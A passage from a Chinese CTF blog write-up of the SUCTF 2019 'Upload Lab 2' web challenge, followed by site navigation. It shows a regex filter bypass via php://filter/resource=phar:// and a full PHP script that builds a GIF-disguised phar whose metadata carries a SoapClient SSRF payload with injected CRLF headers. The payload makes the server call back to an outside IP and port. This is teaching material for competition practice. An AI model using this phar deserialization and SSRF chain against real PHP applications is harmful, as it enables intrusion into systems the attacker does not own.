class="string">'/^(ftp|zlib|data|glob|phar|ssh2|compress.bzip2|compress.zlib|rar|ogg|expect)(.|\\s)*|(.|\\s)*(file|data|\.\.)(.|\\s)*/i'</span>,$_POST[<span class="string">'url'</span>]))&#123;</span><br><span class="line">     <span class="keyword">die</span>(<span class="string">"Go away!"</span>);</span><br><span class="line">   &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">     $file_path = $_POST[<span class="string">'url'</span>];</span><br><span class="line">     $file = <span class="keyword">new</span> File($file_path);</span><br><span class="line">     $file-&gt;getMIME();</span><br><span class="line">     <span class="keyword">echo</span> <span class="string">"&lt;p&gt;Your file type is '$file' &lt;/p&gt;"</span>;</span><br><span class="line">   &#125;</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>
<p>phar协议不能出现在开头，还是zxs那篇文章里写的</p>
<p>也就是说阔以构造绕过一下来调用phar协议，这里的吹一下altman(<a href="https://links.jianshu.com/go?to=https%3A%2F%2Faltman.vip%2F" target="_blank" rel="noopener">https://altman.vip/</a>)，fuzz到一个可以利用的方法<code>php://filter/resource=phar://</code></p>
<p>所以接下来就是生成一个phar脚本，上传后通过func触发就好了</p>
 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">class File&#123;</span><br><span class="line"></span><br><span class="line">public $file_name;</span><br><span class="line">   public $type;</span><br><span class="line">   public $func = &quot;SoapClient&quot;;</span><br><span class="line"></span><br><span class="line">function __construct()&#123;</span><br><span class="line">     $this-&gt;file_name = array(null, array(&apos;location&apos; =&gt; &quot;http://127.0.0.1/admin.php&quot;, &apos;uri&apos; =&gt; &quot;c&quot;, &apos;user_agent&apos; =&gt; &quot;catcat\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 133\r\n\r\nip=72.19.12.57&amp;port=1234&amp;admin=1&amp;clazz=ArrayIterator&amp;func1=append&amp;func2=append&amp;func3=append&amp;arg1=1&amp;arg2=1&amp;arg3=1\r\n\r\n\r\n&quot;));</span><br><span class="line">   &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$o = new File();</span><br><span class="line"> $phar=new Phar(&apos;poc.phar&apos;);</span><br><span class="line"> $phar-&gt;startBuffering();</span><br><span class="line"> $phar-&gt;setStub(&quot;GIF89a&lt; ?php __HALT_COMPILER(); ?&gt;&quot;);</span><br><span class="line"> $phar-&gt;setMetadata($o);</span><br><span class="line"> $phar-&gt;addFromString(&quot;foo.txt&quot;,&quot;bar&quot;);</span><br><span class="line"> $phar-&gt;stopBuffering();</span><br></pre></td></tr></table></figure>
<p>我自己在运行脚本的时候，出现了错误提示</p>
<p><img src="/2019/11/01/SUCTF2019WEB/0502.png" alt="0502"></p>
<p>需要把phar.readonly设置为Off</p>
<p><img src="/2019/11/01/SUCTF2019WEB/0503.png" alt="0503"></p>
<p>然后改个后缀上传，我这里改成了jpg，</p>
<p><img src="/2019/11/01/SUCTF2019WEB/0504.png" alt="0504"></p>
<p>vps上监听一下端口，到func.php触发就可以了</p>
<p>问题来了<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">迷惑，有时间再看吧，咕咕咕</span><br></pre></td></tr></table></figure></p>
<p> <img src="/2019/11/01/SUCTF2019WEB/0505.png" alt="0505"></p>
<p>没看懂，只能把网上大佬的wp搬过来了<del>~</del>~~</p>
<p>再加上点其他大佬的链接</p>
<p><a href="https://byqiyou.github.io/2019/08/20/SUCTF2019-WEB-WP/" target="_blank" rel="noopener">https://byqiyou.github.io/2019/08/20/SUCTF2019-WEB-WP/</a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTFWEB/" rel="tag"># CTFWEB</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2019/10/24/Hackergame2019/" rel="prev" title="Hackergame2019">
      <i class="fa fa-chevron-left"></i> Hackergame2019
    </a></div>
      <div class="post-nav-item">
    <a href="/2019/11/01/10月份总结/" rel="next" title="10月份总结">
      10月份总结 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let activeClass = CONFIG.comments.activeClass;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-EasySQL"><span class="nav-number">1.</span> <span class="nav-text">0x01 EasySQL</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-CheckIn"><span class="nav-number">2.</span> <span class="nav-text">0x02 CheckIn</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-Pythonginx"><span class="nav-number">3.</span> <span class="nav-text">0x03 Pythonginx</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-EasyWeb"><span class="nav-number">4.</span> <span class="nav-text">0x04 EasyWeb</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-Upload-Lab-2"><span class="nav-number">5.</span> <span class="nav-text">0x05 Upload Lab 2</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="瑟瑟发抖咸鱼黄"
      src="/images/HeadPortrait.png">
  <p class="site-author-name" itemprop="name">瑟瑟发抖咸鱼黄</p>
  <div class="site-description" itemprop="description">您看！工具人啥都不配拥有!</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">34</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">12</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title">
      <i class="fa fa-fw fa-link"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://gorgias.me/" title="https://gorgias.me/" rel="noopener" target="_blank">巨佬</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://couplee.wang/" title="http://couplee.wang/" rel="noopener" target="_blank">wnagzihxa1n</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://blog.tity.xyz/" title="https://blog.tity.xyz/" rel="noopener" target="_blank">WarrenRyan</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://pukrr.github.io/" title="https://pukrr.github.io/" rel="noopener" target="_blank">pukrr</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://rinbn.com/" title="http://rinbn.com/" rel="noopener" target="_blank">Rinbn</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.imzj.top/" title="https://www.imzj.top/" rel="noopener" target="_blank">imzj</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://q0o0p.top" title="http://q0o0p.top" rel="noopener" target="_blank">q0o0p</a>
        </li>
    </ul>
  </div>

      </div>
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=40915694&auto=0&height=66"></iframe>
    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">瑟瑟发抖咸鱼黄</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.9.0
  </div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">Theme – <a href="https://muse.theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.7.0
  </div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='150' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script>
<script src="/js/schemes/muse.js"></script>
<script src="/js/next-boot.js"></script>



  















  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"position":"left","width":200,"height":400},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body>
</html>
